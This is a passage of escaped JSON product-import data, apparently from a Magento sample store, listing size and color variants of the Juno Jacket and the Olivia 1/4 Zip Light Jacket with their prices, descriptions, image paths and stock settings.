ple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj06-purple_alt1.jpg,\\/w\\/j\\/wj06-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},\"1330\":{\"sku\":\"WJ06-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Juno Jacket-XL-Blue\",\"description\":\"<p>On colder-than-comfortable mornings, you\'ll love warming up in the Juno All-Ways Performanc Jacket, designed to compete with wind and chill. Built-in Cocona&reg; technology aids evaporation, while a special zip placket and stand-up collar keep your neck protected.<\\/p>\\n<p>&bull; Adjustable hood.<\\/br>&bull; Fleece-lined, zippered hand pockets.<\\/br>&bull; Thumbhole cuffs.<\\/br>&bull; Full zip.<\\/br>&bull; Mock-neck collar.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juno-jacket-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"1331\":{\"sku\":\"WJ06-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Juno Jacket-XL-Green\",\"description\":\"<p>On colder-than-comfortable mornings, you\'ll love warming up in the Juno All-Ways Performanc Jacket, designed to compete with wind and chill. Built-in Cocona&reg; technology aids evaporation, while a special zip placket and stand-up collar keep your neck protected.<\\/p>\\n<p>&bull; Adjustable hood.<\\/br>&bull; Fleece-lined, zippered hand pockets.<\\/br>&bull; Thumbhole cuffs.<\\/br>&bull; Full zip.<\\/br>&bull; Mock-neck collar.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juno-jacket-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj06-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj06-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj06-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj06-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj06-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"1332\":{\"sku\":\"WJ06-XL-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Juno Jacket-XL-Purple\",\"description\":\"<p>On colder-than-comfortable mornings, you\'ll love warming up in the Juno All-Ways Performanc Jacket, designed to compete with wind and chill. Built-in Cocona&reg; technology aids evaporation, while a special zip placket and stand-up collar keep your neck protected.<\\/p>\\n<p>&bull; Adjustable hood.<\\/br>&bull; Fleece-lined, zippered hand pockets.<\\/br>&bull; Thumbhole cuffs.<\\/br>&bull; Full zip.<\\/br>&bull; Mock-neck collar.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juno-jacket-xl-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj06-purple_alt1.jpg,\\/w\\/j\\/wj06-purple_back.jpg\",\"image\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj06-purple_alt1.jpg,\\/w\\/j\\/wj06-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Purple\"},\"1333\":{\"sku\":\"WJ06\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Juno Jacket\",\"description\":\"<p>On colder-than-comfortable mornings, you\'ll love warming up in the Juno All-Ways Performanc Jacket, designed to compete with wind and chill. Built-in Cocona&reg; technology aids evaporation, while a special zip placket and stand-up collar keep your neck protected.<\\/p>\\n<p>&bull; Adjustable hood.<\\/br>&bull; Fleece-lined, zippered hand pockets.<\\/br>&bull; Thumbhole cuffs.<\\/br>&bull; Full zip.<\\/br>&bull; Mock-neck collar.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Insulated|Jacket|Heavy Duty|Hard Shell|Full zip|Reversible,material=Cocona&reg; performance fabric|Fleece,pattern=Solid,climate=Cold|Cool|Spring|Windy|Wintry,eco_collection=No,performance_fabric=Yes,erin_recommends=No,new=No,sale=Yes\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WJ06-XS-Blue,size=XS,color=Blue|sku=WJ06-XS-Green,size=XS,color=Green|sku=WJ06-XS-Purple,size=XS,color=Purple|sku=WJ06-S-Blue,size=S,color=Blue|sku=WJ06-S-Green,size=S,color=Green|sku=WJ06-S-Purple,size=S,color=Purple|sku=WJ06-M-Blue,size=M,color=Blue|sku=WJ06-M-Green,size=M,color=Green|sku=WJ06-M-Purple,size=M,color=Purple|sku=WJ06-L-Blue,size=L,color=Blue|sku=WJ06-L-Green,size=L,color=Green|sku=WJ06-L-Purple,size=L,color=Purple|sku=WJ06-XL-Blue,size=XL,color=Blue|sku=WJ06-XL-Green,size=XL,color=Green|sku=WJ06-XL-Purple,size=XL,color=Purple\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj06-purple_alt1.jpg,\\/w\\/j\\/wj06-purple_back.jpg\",\"image\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj06-purple_alt1.jpg,\\/w\\/j\\/wj06-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Insulated|Jacket|Heavy Duty|Hard Shell|Full zip|Reversible\",\"material\":\"Cocona&reg; performance fabric|Fleece\",\"pattern\":\"Solid\",\"climate\":\"Cold|Cool|Spring|Windy|Wintry\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"Yes\"},\"1334\":{\"sku\":\"WJ12-XS-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Olivia 1\\/4 Zip Light Jacket-XS-Black\",\"description\":\"<p>Running errands or headed to the gym, you just want to be comfortable. The Olivia Light Jacket promises that, plus a laid-back look. This zip-up is designed with shoulder stripes for an athletic touch, and banded waist and contoured seams for a flattering silhouette.<\\/p>\\n<p>&bull; Loose fit.<\\/br>&bull; Reflectivity.<\\/br>&bull; Flat seams.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"olivia-1-4-zip-light-jacket-xs-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj12-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj12-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj12-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj12-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj12-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Black\"},\"1335\":{\"sku\":\"WJ12-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Olivia 1\\/4 Zip Light Jacket-XS-Blue\",\"description\":\"<p>Running errands or headed to the gym, you just want to be comfortable. The Olivia Light Jacket promises that, plus a laid-back look. This zip-up is designed with shoulder stripes for an athletic touch, and banded waist and contoured seams for a flattering silhouette.<\\/p>\\n<p>&bull; Loose fit.<\\/br>&bull; Reflectivity.<\\/br>&bull; Flat seams.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"olivia-1-4-zip-light-jacket-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj12-blue_alt1.jpg,\\/w\\/j\\/wj12-blue_back.jpg\",\"image\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj12-blue_alt1.jpg,\\/w\\/j\\/wj12-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"1336\":{\"sku\":\"WJ12-XS-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Olivia 1\\/4 Zip Light Jacket-XS-Purple\",\"description\":\"<p>Running errands or headed to the gym, you just want to be comfortable. The Olivia Light Jacket promises that, plus a laid-back look. This zip-up is designed with shoulder stripes for an athletic touch, and banded waist and contoured seams for a flattering silhouette.<\\/p>\\n<p>&bull; Loose fit.<\\/br>&bull; Reflectivity.<\\/br>&bull; Flat seams.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"olivia-1-4-zip-light-jacket-xs-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj12-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj12-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj12-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj12-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj12-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Purple\"},\"1337\":{\"sku\":\"WJ12-S-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Olivia 1\\/4 Zip Light Jacket-S-Black\",\"description\":\"<p>Running errands or headed to the gym, you just want to be comfortable. The Olivia Light Jacket promises that, plus a laid-back look. This zip-up is designed with shoulder stripes for an athletic touch, and banded waist and contoured seams for a flattering silhouette.<\\/p>\\n<p>&bull; Loose fit.<\\/br>&bull; Reflectivity.<\\/br>&bull; Flat seams.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"olivia-1-4-zip-light-jacket-s-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj12-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj12-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj12-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj12-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj12-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta